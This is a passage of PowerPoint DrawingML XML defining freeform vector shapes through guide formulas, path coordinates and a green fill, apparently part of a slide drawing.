                  <a:gd name="T0" fmla="*/ 133 w 156"/>
                  <a:gd name="T1" fmla="*/ 154 h 234"/>
                  <a:gd name="T2" fmla="*/ 137 w 156"/>
                  <a:gd name="T3" fmla="*/ 161 h 234"/>
                  <a:gd name="T4" fmla="*/ 154 w 156"/>
                  <a:gd name="T5" fmla="*/ 166 h 234"/>
                  <a:gd name="T6" fmla="*/ 146 w 156"/>
                  <a:gd name="T7" fmla="*/ 188 h 234"/>
                  <a:gd name="T8" fmla="*/ 146 w 156"/>
                  <a:gd name="T9" fmla="*/ 199 h 234"/>
                  <a:gd name="T10" fmla="*/ 143 w 156"/>
                  <a:gd name="T11" fmla="*/ 209 h 234"/>
                  <a:gd name="T12" fmla="*/ 126 w 156"/>
                  <a:gd name="T13" fmla="*/ 214 h 234"/>
                  <a:gd name="T14" fmla="*/ 107 w 156"/>
                  <a:gd name="T15" fmla="*/ 214 h 234"/>
                  <a:gd name="T16" fmla="*/ 88 w 156"/>
                  <a:gd name="T17" fmla="*/ 219 h 234"/>
                  <a:gd name="T18" fmla="*/ 72 w 156"/>
                  <a:gd name="T19" fmla="*/ 224 h 234"/>
                  <a:gd name="T20" fmla="*/ 62 w 156"/>
                  <a:gd name="T21" fmla="*/ 224 h 234"/>
                  <a:gd name="T22" fmla="*/ 45 w 156"/>
                  <a:gd name="T23" fmla="*/ 234 h 234"/>
                  <a:gd name="T24" fmla="*/ 49 w 156"/>
                  <a:gd name="T25" fmla="*/ 220 h 234"/>
                  <a:gd name="T26" fmla="*/ 59 w 156"/>
                  <a:gd name="T27" fmla="*/ 209 h 234"/>
                  <a:gd name="T28" fmla="*/ 74 w 156"/>
                  <a:gd name="T29" fmla="*/ 204 h 234"/>
                  <a:gd name="T30" fmla="*/ 85 w 156"/>
                  <a:gd name="T31" fmla="*/ 192 h 234"/>
                  <a:gd name="T32" fmla="*/ 50 w 156"/>
                  <a:gd name="T33" fmla="*/ 191 h 234"/>
                  <a:gd name="T34" fmla="*/ 56 w 156"/>
                  <a:gd name="T35" fmla="*/ 181 h 234"/>
                  <a:gd name="T36" fmla="*/ 63 w 156"/>
                  <a:gd name="T37" fmla="*/ 161 h 234"/>
                  <a:gd name="T38" fmla="*/ 61 w 156"/>
                  <a:gd name="T39" fmla="*/ 155 h 234"/>
                  <a:gd name="T40" fmla="*/ 80 w 156"/>
                  <a:gd name="T41" fmla="*/ 143 h 234"/>
                  <a:gd name="T42" fmla="*/ 77 w 156"/>
                  <a:gd name="T43" fmla="*/ 127 h 234"/>
                  <a:gd name="T44" fmla="*/ 79 w 156"/>
                  <a:gd name="T45" fmla="*/ 108 h 234"/>
                  <a:gd name="T46" fmla="*/ 64 w 156"/>
                  <a:gd name="T47" fmla="*/ 110 h 234"/>
                  <a:gd name="T48" fmla="*/ 51 w 156"/>
                  <a:gd name="T49" fmla="*/ 110 h 234"/>
                  <a:gd name="T50" fmla="*/ 55 w 156"/>
                  <a:gd name="T51" fmla="*/ 91 h 234"/>
                  <a:gd name="T52" fmla="*/ 54 w 156"/>
                  <a:gd name="T53" fmla="*/ 80 h 234"/>
                  <a:gd name="T54" fmla="*/ 48 w 156"/>
                  <a:gd name="T55" fmla="*/ 78 h 234"/>
                  <a:gd name="T56" fmla="*/ 42 w 156"/>
                  <a:gd name="T57" fmla="*/ 70 h 234"/>
                  <a:gd name="T58" fmla="*/ 41 w 156"/>
                  <a:gd name="T59" fmla="*/ 57 h 234"/>
                  <a:gd name="T60" fmla="*/ 35 w 156"/>
                  <a:gd name="T61" fmla="*/ 54 h 234"/>
                  <a:gd name="T62" fmla="*/ 41 w 156"/>
                  <a:gd name="T63" fmla="*/ 38 h 234"/>
                  <a:gd name="T64" fmla="*/ 46 w 156"/>
                  <a:gd name="T65" fmla="*/ 26 h 234"/>
                  <a:gd name="T66" fmla="*/ 48 w 156"/>
                  <a:gd name="T67" fmla="*/ 5 h 234"/>
                  <a:gd name="T68" fmla="*/ 68 w 156"/>
                  <a:gd name="T69" fmla="*/ 2 h 234"/>
                  <a:gd name="T70" fmla="*/ 79 w 156"/>
                  <a:gd name="T71" fmla="*/ 9 h 234"/>
                  <a:gd name="T72" fmla="*/ 63 w 156"/>
                  <a:gd name="T73" fmla="*/ 30 h 234"/>
                  <a:gd name="T74" fmla="*/ 84 w 156"/>
                  <a:gd name="T75" fmla="*/ 31 h 234"/>
                  <a:gd name="T76" fmla="*/ 94 w 156"/>
                  <a:gd name="T77" fmla="*/ 45 h 234"/>
                  <a:gd name="T78" fmla="*/ 87 w 156"/>
                  <a:gd name="T79" fmla="*/ 62 h 234"/>
                  <a:gd name="T80" fmla="*/ 86 w 156"/>
                  <a:gd name="T81" fmla="*/ 70 h 234"/>
                  <a:gd name="T82" fmla="*/ 77 w 156"/>
                  <a:gd name="T83" fmla="*/ 76 h 234"/>
                  <a:gd name="T84" fmla="*/ 76 w 156"/>
                  <a:gd name="T85" fmla="*/ 80 h 234"/>
                  <a:gd name="T86" fmla="*/ 89 w 156"/>
                  <a:gd name="T87" fmla="*/ 78 h 234"/>
                  <a:gd name="T88" fmla="*/ 103 w 156"/>
                  <a:gd name="T89" fmla="*/ 93 h 234"/>
                  <a:gd name="T90" fmla="*/ 110 w 156"/>
                  <a:gd name="T91" fmla="*/ 114 h 234"/>
                  <a:gd name="T92" fmla="*/ 125 w 156"/>
                  <a:gd name="T93" fmla="*/ 136 h 234"/>
                  <a:gd name="T94" fmla="*/ 29 w 156"/>
                  <a:gd name="T95" fmla="*/ 128 h 234"/>
                  <a:gd name="T96" fmla="*/ 19 w 156"/>
                  <a:gd name="T97" fmla="*/ 121 h 234"/>
                  <a:gd name="T98" fmla="*/ 4 w 156"/>
                  <a:gd name="T99" fmla="*/ 125 h 234"/>
                  <a:gd name="T100" fmla="*/ 3 w 156"/>
                  <a:gd name="T101" fmla="*/ 112 h 234"/>
                  <a:gd name="T102" fmla="*/ 14 w 156"/>
                  <a:gd name="T103" fmla="*/ 100 h 234"/>
                  <a:gd name="T104" fmla="*/ 29 w 156"/>
                  <a:gd name="T105" fmla="*/ 99 h 234"/>
                  <a:gd name="T106" fmla="*/ 38 w 156"/>
                  <a:gd name="T107" fmla="*/ 113 h 234"/>
                  <a:gd name="T108" fmla="*/ 35 w 156"/>
                  <a:gd name="T109" fmla="*/ 130 h 234"/>
                  <a:gd name="T110" fmla="*/ 38 w 156"/>
                  <a:gd name="T111" fmla="*/ 90 h 234"/>
                  <a:gd name="T112" fmla="*/ 40 w 156"/>
                  <a:gd name="T113" fmla="*/ 94 h 234"/>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56"/>
                  <a:gd name="T172" fmla="*/ 0 h 234"/>
                  <a:gd name="T173" fmla="*/ 156 w 156"/>
                  <a:gd name="T174" fmla="*/ 234 h 234"/>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56" h="234">
                    <a:moveTo>
                      <a:pt x="126" y="143"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="130" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="143"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="31" y="132"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="132"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="39" y="94"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="38" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="94"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36153" name="Freeform 286"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2643" y="1793"/>
                <a:ext cx="123" cy="234"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 99 w 123"/>
                  <a:gd name="T1" fmla="*/ 149 h 234"/>
                  <a:gd name="T2" fmla="*/ 96 w 123"/>
                  <a:gd name="T3" fmla="*/ 163 h 234"/>
                  <a:gd name="T4" fmla="*/ 108 w 123"/>
                  <a:gd name="T5" fmla="*/ 160 h 234"/>
                  <a:gd name="T6" fmla="*/ 121 w 123"/>
                  <a:gd name="T7" fmla="*/ 166 h 234"/>
                  <a:gd name="T8" fmla="*/ 120 w 123"/>
                  <a:gd name="T9" fmla="*/ 182 h 234"/>
                  <a:gd name="T10" fmla="*/ 100 w 123"/>
                  <a:gd name="T11" fmla="*/ 197 h 234"/>
                  <a:gd name="T12" fmla="*/ 115 w 123"/>
                  <a:gd name="T13" fmla="*/ 198 h 234"/>
                  <a:gd name="T14" fmla="*/ 110 w 123"/>
                  <a:gd name="T15" fmla="*/ 209 h 234"/>
                  <a:gd name="T16" fmla="*/ 99 w 123"/>
                  <a:gd name="T17" fmla="*/ 215 h 234"/>
                  <a:gd name="T18" fmla="*/ 83 w 123"/>
                  <a:gd name="T19" fmla="*/ 215 h 234"/>
                  <a:gd name="T20" fmla="*/ 63 w 123"/>
                  <a:gd name="T21" fmla="*/ 216 h 234"/>
                  <a:gd name="T22" fmla="*/ 55 w 123"/>
                  <a:gd name="T23" fmla="*/ 219 h 234"/>
                  <a:gd name="T24" fmla="*/ 40 w 123"/>
                  <a:gd name="T25" fmla="*/ 218 h 234"/>
                  <a:gd name="T26" fmla="*/ 34 w 123"/>
                  <a:gd name="T27" fmla="*/ 228 h 234"/>
                  <a:gd name="T28" fmla="*/ 28 w 123"/>
                  <a:gd name="T29" fmla="*/ 225 h 234"/>
                  <a:gd name="T30" fmla="*/ 12 w 123"/>
                  <a:gd name="T31" fmla="*/ 234 h 234"/>
                  <a:gd name="T32" fmla="*/ 13 w 123"/>
                  <a:gd name="T33" fmla="*/ 225 h 234"/>
                  <a:gd name="T34" fmla="*/ 23 w 123"/>
                  <a:gd name="T35" fmla="*/ 214 h 234"/>
                  <a:gd name="T36" fmla="*/ 28 w 123"/>
                  <a:gd name="T37" fmla="*/ 207 h 234"/>
                  <a:gd name="T38" fmla="*/ 41 w 123"/>
                  <a:gd name="T39" fmla="*/ 204 h 234"/>
                  <a:gd name="T40" fmla="*/ 50 w 123"/>
                  <a:gd name="T41" fmla="*/ 199 h 234"/>
                  <a:gd name="T42" fmla="*/ 40 w 123"/>
                  <a:gd name="T43" fmla="*/ 197 h 234"/>
                  <a:gd name="T44" fmla="*/ 14 w 123"/>
                  <a:gd name="T45" fmla="*/ 189 h 234"/>
                  <a:gd name="T46" fmla="*/ 23 w 123"/>
                  <a:gd name="T47" fmla="*/ 181 h 234"/>
                  <a:gd name="T48" fmla="*/ 31 w 123"/>
                  <a:gd name="T49" fmla="*/ 164 h 234"/>
                  <a:gd name="T50" fmla="*/ 23 w 123"/>
                  <a:gd name="T51" fmla="*/ 161 h 234"/>
                  <a:gd name="T52" fmla="*/ 33 w 123"/>
                  <a:gd name="T53" fmla="*/ 152 h 234"/>
                  <a:gd name="T54" fmla="*/ 47 w 123"/>
                  <a:gd name="T55" fmla="*/ 143 h 234"/>
                  <a:gd name="T56" fmla="*/ 50 w 123"/>
                  <a:gd name="T57" fmla="*/ 126 h 234"/>
                  <a:gd name="T58" fmla="*/ 39 w 123"/>
                  <a:gd name="T59" fmla="*/ 119 h 234"/>
                  <a:gd name="T60" fmla="*/ 43 w 123"/>
                  <a:gd name="T61" fmla="*/ 106 h 234"/>
                  <a:gd name="T62" fmla="*/ 31 w 123"/>
                  <a:gd name="T63" fmla="*/ 110 h 234"/>
                  <a:gd name="T64" fmla="*/ 23 w 123"/>
                  <a:gd name="T65" fmla="*/ 112 h 234"/>
                  <a:gd name="T66" fmla="*/ 16 w 123"/>
                  <a:gd name="T67" fmla="*/ 105 h 234"/>
